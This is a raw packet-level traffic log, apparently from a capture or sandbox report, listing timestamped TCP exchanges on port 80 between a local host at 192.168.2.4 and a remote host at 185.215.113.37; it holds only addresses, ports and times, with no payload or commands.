Sep 28, 2024 07:32:13.334639072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.334649086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.334657907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.334659100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.334670067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.334680080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.334686041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.334690094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.334702015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.334707022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.334712982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.334722042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.334724903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.334734917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.334739923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.334745884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.334755898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.334765911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.334772110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.334795952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.334810019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.335258961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.335268021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.335304976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.335400105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.335410118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.335427046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.335437059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.335447073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.335450888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.335458994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.335467100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.335470915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.335480928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.335490942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.335494995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.335501909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.335511923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.335521936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.335521936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.335535049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.335541964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.335546017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.335573912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.335573912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.335589886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.335881948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.335895061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.335930109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.335946083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.335958004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.335967064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.335978031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.335988045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.335992098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.336002111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.336008072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.336013079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.336033106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.336056948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.336246967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.336257935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.336266994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.336277962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.336287975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.336296082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.336298943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.336311102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.336322069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.336328030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.336345911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.336365938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.336519957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.336564064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.336599112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.336611032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.336621046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.336632013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.336641073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.336642981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.336669922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.336682081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.419709921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.419734001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.419743061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.419791937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.419801950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.419815063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.419846058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.419925928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.419939995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.419950962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.419960976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.419972897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.419974089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.420011044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.420058012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.420135021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.420151949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.420161963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.420171976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.420182943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.420192957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.420198917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.420221090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.420265913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.420437098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.420448065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.420459032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.420469046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.420479059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.420484066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.420490026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.420500994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.420511007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.420511007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.420521975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.420531988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.420536995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.420542955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.420553923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.420567036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.420587063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.420975924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.420986891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.420995951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421005964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421015978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421024084 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.421025038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421036005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421041012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.421052933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421060085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.421065092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421076059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421084881 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.421084881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421096087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421102047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.421108007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421119928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421129942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421134949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.421142101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421152115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421154976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.421164036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421175003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.421205997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.421672106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421681881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421690941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421700954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421710968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421720982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421722889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.421734095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421744108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421745062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.421753883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421765089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.421766043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421777010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421787024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.421793938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.421823978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.422157049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422168016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422178030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422190905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422200918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422204018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.422211885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422219992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.422224045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422235966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422245979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.422246933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422259092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422261000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.422276020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422287941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422292948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.422297955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422307968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.422338963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.422712088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422727108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422738075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422746897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422758102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422760010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.422769070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422780991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422791004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422792912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.422804117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422813892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422823906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422827959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.422835112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422838926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.422847033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422857046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422863960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.422868013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422879934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422889948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422895908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.422899961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422911882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422921896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422925949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.422931910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.422946930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.422966957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.423577070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.423588037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.423597097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.423605919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.423615932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.423625946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.423628092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.423636913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.423646927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.423655987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.423655987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.423667908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.423671961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.423680067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.423688889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.423695087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.423698902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.423710108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.423713923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.423727989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.423729897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.423968077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.423968077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.424180031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.424190998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.424200058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.424210072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.424220085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.424230099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.424230099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.424246073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.424256086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.424258947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.424266100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.424274921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.424276114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.424285889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.424297094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.424307108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.424309969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.424318075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.424328089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.424335957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.424340010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.424355984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.424375057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.507514000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.507548094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.507559061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.507594109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.507623911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.507661104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.507673025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.507683039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.507711887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.507730961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.507738113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.507786036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.507791996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.507841110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.507865906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.507874966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.507885933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.507896900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.507905960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.507913113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.507939100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.507951021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.508019924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.508030891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.508039951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.508068085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.508090019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.508163929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.508176088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.508186102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.508197069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.508207083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.508209944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.508241892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.508344889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.508392096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.508487940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.508498907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.508508921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.508518934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.508527994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.508529902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.508538961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.508546114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.508550882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.508559942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.508569956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.508577108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.508589983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.508595943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.508599997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.508610010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.508615971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.508621931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.508642912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.508661985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.508883953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.508949041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.509068966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509078979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509088993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509098053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509109020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509118080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509120941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.509124994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509135962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509145975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509156942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509157896 CEST	49730	80	192.168.2.4	185.215.113.37
